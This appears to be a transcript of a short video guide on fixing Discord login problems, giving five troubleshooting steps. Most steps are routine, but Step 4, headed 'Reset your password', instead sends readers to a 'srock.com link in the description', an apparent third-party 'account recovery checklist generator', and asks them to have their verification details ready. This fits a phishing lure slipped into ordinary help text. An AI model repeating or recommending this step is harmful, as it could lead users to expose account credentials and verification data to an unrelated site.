I hit this issue today and here is the quick fix that solved it. If you're struggling to log into the Discord app, follow these steps to get back online. Step 1. Check your internet connection. Make sure your device is connected to the internet. A weak or unstable connection can prevent you from logging in. Step 2. Update the Discord app. Ensure that you have the latest version of the Discord app installed. Outdated versions can cause login issues. Go to your app store and check for updates. Step 3. Clear app cache. If you're using a mobile device, clearing the app cache can help. Go to your device settings, find Discord, and select Clear Cache. Gotcha, on some devices, you might need to tap storage before seeing the Clear Cache option. Step 4. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Reinstall the app. If all else fails, uninstall and then reinstall the Discord app. This can resolve any underlying issues with the app itself. I hope these steps help you get back into Discord without any hassle. If you continue to have issues, consider reaching out to Discord support for further assistance.